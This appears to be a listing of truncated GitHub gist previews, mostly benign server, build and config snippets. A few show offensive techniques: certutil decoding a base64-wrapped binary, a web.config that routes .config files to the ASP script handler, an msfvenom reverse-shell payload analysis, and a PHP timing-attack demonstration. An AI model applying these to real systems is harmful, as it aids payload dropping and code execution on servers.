19WAS85

# This is a super **SIMPLE** example of how to create a very basic powershell webserver
# 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity.

# Http Server
$http = [System.Net.HttpListener]::new() 

# Hostname and port to listen on
$http.Prefixes.Add("http://localhost:8080/")

# Start the Http Server 

dergachev

# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:4443

import BaseHTTPServer, SimpleHTTPServer
import ssl

jjgod

Steps to checkout Chromium release branches

Initial setup

mkdir chromium && cd chromium
fetch --nohooks chromium --nosvn=True
gclient sync --with_branch_heads --nohooks # May not even need this.

Fetching/updating a specific release branch

defuse

<?php

/*
 * This code is copied from 
 * http://www.warpconduit.net/2013/04/14/highly-secure-data-encryption-decryption-made-easy-with-php-mcrypt-rijndael-256-and-cbc/
 * to demonstrate an attack against it. Specifically, we simulate a timing leak
 * in the MAC comparison which, in a Mac-then-Encrypt (MtA) design, we show
 * breaks confidentiality.
 *
 * Slight modifications such as making it not serialize/unserialize and removing

mattifestation

echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin

toan2406

$ sudo nano /etc/systemd/system/startup.service

  [Unit]
  Description=Startup

  [Service]
  ExecStart=/usr/local/bin/startup.sh

  [Install]
  WantedBy=default.target

mgeeky

Looking for WaitForSingleObject call within modern msfvenom generated payload.

---

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

cji

Open the debugger VM's .vmx file. delete the existing serial0 lines (used for printing, not needed) add these lines:

serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"

gazcbm

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />

ppmotskula

#!/bin/bash

ABOUT="piactl 0.10
Copyright (c) 2018-2020 Peeter P. Mõtsküla <peeterpaul@motskula.net>
https://gist.github.com/ppmotskula/4288167460de27d22225e4959c44c6c4
License: MIT License (https://opensource.org/licenses/MIT)

piactl helps you to install, configure and control CNIL's PIA software
(https://www.cnil.fr/en/open-source-pia-software-helps-carry-out-data-protection-impact-assesment)